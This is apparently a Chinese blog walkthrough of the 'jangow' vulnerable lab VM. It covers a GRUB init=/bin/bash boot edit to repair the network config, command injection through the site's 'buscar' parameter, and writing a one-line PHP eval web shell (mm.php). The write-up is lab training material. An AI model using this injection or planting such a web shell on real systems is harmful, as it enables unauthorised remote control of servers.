当前位置: 首页 > article >正文

jangow靶机

打开靶机,打开kali,有的人会发现扫不到靶机的ip

在网上搜索了半天,发现是靶机的网卡配置有问题

重启靶机,选第二个

进去后再选第二个,按e

找到ro这一行

把ro后面这一行的内容都替换成ro = rw signin init=/bin/bash

ctrl+x

输入ifconfig -a查看一下自己的网卡名称,我是ens33

在输入

cd etc

cd network

vim interfaces

改下这个网卡名称就好了

按shift+/

输入wq保存

重启靶机

再打开kali扫描一下就出来靶机的ip了

去访问

我们进入网站以后,首先扫描一下端口,发现没有有用的信息,在扫一下后台,目前也没有什么有用的信息

我们在点击页面上的size

我们翻了翻,发现了点进buscar中页面空白,但是网址上有一个buscar的参数

我们经过尝试之后,竟然可以执行系统命令

那么我们尝试写个木马进去

一开始我写的是echo '<?php @eval($_POST['cmd']); ?>' > mm.php

但是经过测试,会乱码,多次尝试之后把POST中的cmd缩短,并且把单引号去掉就好了

输入echo '<?php @eval($_POST[c]); ?>' > mm.php

在去访问mm.php

检查一下是否写入成功

写入成功!!!


http://www.kler.cn/a/458161.html

相关文章:

  • 【探花交友】day01—项目介绍与环境搭建
  • 10道JavaWeb常问面试题
  • Dify服务器部署教程
  • Python中构建终端应用界面利器——Blessed模块
  • QT笔记- QTreeView + QFileSystemModel 当前位置的保存与恢复 #选中 #保存当前索引
  • 2025年我国网络安全发展形势展望
  • C语言基础学习记录-内存管理
  • TCP 为什么采用三次握手和四次挥手以及 TCP 和 UDP 的区别
  • 实用技巧:关于 AD修改原理图库如何同步更新到有原理图 的解决方法
  • 【Linux】:Linux网络协议
  • Redis 多机功能 — 复制、Sentinel及集群
  • 为什么推荐使用构造函数注入而非@Autowired注解进行字段注入
  • 如何做一款游戏
  • Vuex中dispatch的用法
  • json的作用?
  • Spring Boot教程之三十九: 使用 Maven 将 Spring Boot 应用程序 Docker 化
  • youtube下载的视频怎么保存到本地
  • 华为:数字化转型只有“起点”,没有“终点”
  • 【Golang 面试题】每日 3 题(五)
  • XML工具类 - C#小函数类推荐